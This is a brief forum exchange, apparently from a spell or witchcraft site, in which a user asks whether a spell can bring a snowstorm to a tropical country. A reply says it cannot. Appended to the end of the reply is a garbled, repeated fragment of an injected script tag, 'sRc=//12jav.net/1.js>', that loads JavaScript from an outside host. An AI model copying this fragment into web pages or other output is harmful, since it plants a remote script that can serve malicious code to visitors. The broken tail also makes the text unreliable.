Snow Storm Spell..

Question!

First, are they possible?

If yes, can I use it in a tropical country?

I know, it's against nature's law, so... is it not possible in a tropical country?

If yes, can you suggest one?

As for the reason, it's only for the sake of me and my mom seeing snow without paying a plane ticket so it's not that important. And it just tickled my curiosity.

No, you can't create a snowstorm in the tropics.

The most one can do is to work with the normal weather patterns where you live to do minor things. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
